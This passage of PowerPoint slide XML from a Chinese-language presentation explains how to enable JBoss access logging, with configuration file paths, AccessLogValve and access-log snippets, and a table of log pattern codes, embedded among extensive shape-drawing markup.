              <a:path w="7381875" h="902335">
                <a:moveTo>
                  <a:pt x="9525" y="897305"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="892543"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="892543"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="897305"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7381875" h="902335">
                <a:moveTo>
                  <a:pt x="7372248" y="897305"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="897305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="892543"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7372248" y="892543"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7372248" y="897305"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7381875" h="902335">
                <a:moveTo>
                  <a:pt x="7381773" y="897305"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7372248" y="897305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7377010" y="892543"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7381773" y="892543"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7381773" y="89730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0676" y="1387691"/>
            <a:ext cx="9222740" cy="447167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访问日志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access_log</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5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（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这是我们感兴趣的）</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="509905">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="590"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>JBoss4-5-6</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="509905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修改</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>${JBOSS_HOME}/server/defaul/deploy/jbossweb.sar/server.xml</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>找到如下代码：</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="509905">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-25" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>&lt;Valve</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> className="org.apache.catalina.valves.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AccessLogValve</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0"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  <a:p>
            <a:pPr marL="243204">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="625"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>JBoss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Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>，每个</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>应用需要配置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97205">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>每个网站的</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>WEB-INF/jboss-web.xml</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>文件，配置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AccessLogValve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  <a:p>
            <a:pPr marL="509905">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>上述</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>代码默认情况下是注释的，将注释去掉，就打开了访问日志记</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>录</a:t>
            </a:r>
            <a:endParaRPr sz="1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5067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JBoss </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>7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28600" algn="ctr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latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>JBoss/standalone/configuration</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>文件夹，修改</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>standalone.xml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Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="95" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>domain.xml</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>配置文件，</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="5067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&lt;/virtual-server&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>前添加</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="9639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&lt;access-log pattern="%a %t %H %p %U %s %S %T"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rotate="true"&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="1741805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&lt;directory path="."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relative-to="jboss.server.log.dir"/&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="9639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&lt;/access-log&gt;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00331" y="3811270"/>
            <a:ext cx="391795" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="391795" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="391668" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="391668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11270"/>
            <a:ext cx="1005840" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1005840" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1005840" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1005840" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0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9272" y="289179"/>
            <a:ext cx="483234" cy="3522345"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="483234" h="3522345">
                <a:moveTo>
                  <a:pt x="482726" y="3522281"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="3522281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="482726" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="482726" y="3522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Jbo</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="5" dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>ss</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>开启日志功能的方法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005839" y="1918716"/>
            <a:ext cx="5821680" cy="3538854"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5821680" h="3538854">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5821680" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="582168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522" y="1913864"/>
            <a:ext cx="5830570" cy="3549015"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5830570" h="3549015">
                <a:moveTo>
                  <a:pt x="5825299" y="3548951"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="3548951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="3548722"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1968" y="3548037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914" y="3546983"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228" y="3545662"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3544189"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5825299" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5830061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539426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="3539426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="3544189"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5830061" y="3544189"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5829833" y="3545662"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5829160" y="3546983"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5828106" y="3548037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5826772" y="3548722"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5825299" y="3548951"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5830570" h="35490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830570" h="3549015">
                <a:moveTo>
                  <a:pt x="5820536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820536" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5820536" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5830570" h="3549015">
                <a:moveTo>
                  <a:pt x="5820536" y="3544189"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5820536" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5825299" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5830061" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5830061" y="3539426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5825299" y="3539426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5820536" y="3544189"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5830570" h="3549015">
                <a:moveTo>
                  <a:pt x="5830061" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5825299" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5820536" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5830061" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5830061" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5830570" h="3549015">
                <a:moveTo>
                  <a:pt x="9525" y="3544189"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="3539426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="3539426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="3544189"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5830570" h="3549015">
                <a:moveTo>
                  <a:pt x="5820536" y="3544189"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="3544189"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="3539426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5820536" y="3539426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5820536" y="3544189"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5830570" h="3549015">
                <a:moveTo>
                  <a:pt x="5830061" y="3544188"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5820536" y="3544189"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5825299" y="3539426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5830061" y="3539426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5830061" y="35441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8680" y="1488097"/>
            <a:ext cx="3264535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EF7E08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Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>访问日志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access_log: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pattern</a:t>
            </a:r>
            <a:endParaRPr sz="1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Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>pattern</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>的详细说明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tabLst>
                <a:tab pos="1124585" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>%a	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>远端</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0"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Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>本地</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0"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1084" y="2673642"/>
            <a:ext cx="5318316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2130" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>%b	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>发送的字节数，不包含</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>头，如果为</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="275" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="275" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>-”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4355" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>%B	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>发送的字节数，不包含</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>头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tabLst>
                <a:tab pos="532130" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>%h	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>远端主机名（如果</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>resolveHosts=false</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>），</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>远端的</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0"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4804" y="3405161"/>
            <a:ext cx="8375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Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>请求协</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>议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1084" y="3649002"/>
            <a:ext cx="45986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4184" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>%l	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>从</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>identd</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>返回的远端逻辑用户名，总是返回</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="380" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="380" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>-’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1084" y="3892842"/>
            <a:ext cx="16173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8645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请求的方</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>法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1084" y="4136681"/>
            <a:ext cx="257683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2130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收到请求的本地端口</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>号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tabLst>
                <a:tab pos="532130" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>%q	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>查询字符</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>串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tabLst>
                <a:tab pos="487045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请求的第一</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>行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tabLst>
                <a:tab pos="497840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响应的状态</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>码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80176" y="3544823"/>
            <a:ext cx="5820410" cy="1816735"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5820409" h="1816735">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5820156" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5820156" y="1816607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1816607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75299" y="3540480"/>
            <a:ext cx="5830570" cy="1825625"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5830570" h="1825625">
                <a:moveTo>
                  <a:pt x="5825312" y="1825409"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="1825409"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="1825167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1968" y="1824494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914" y="1823440"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241" y="1822119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1820646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5825312" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="583007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15884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="1815884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1820646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5830074" y="1820646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5829833" y="1822119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5829160" y="1823440"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5828106" y="1824494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5826785" y="1825167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5825312" y="1825409"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5830570" h="18256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830570" h="1825625">
                <a:moveTo>
                  <a:pt x="582054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820549" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5820549" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5830570" h="1825625">
                <a:moveTo>
                  <a:pt x="5820549" y="1820646"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5820549" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5825312" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5830074" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5830074" y="1815884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5825312" y="1815884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5820549" y="1820646"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5830570" h="1825625">
                <a:moveTo>
                  <a:pt x="5830074" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5825312" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5820549" y="4762"/>
                </a:lnTo>
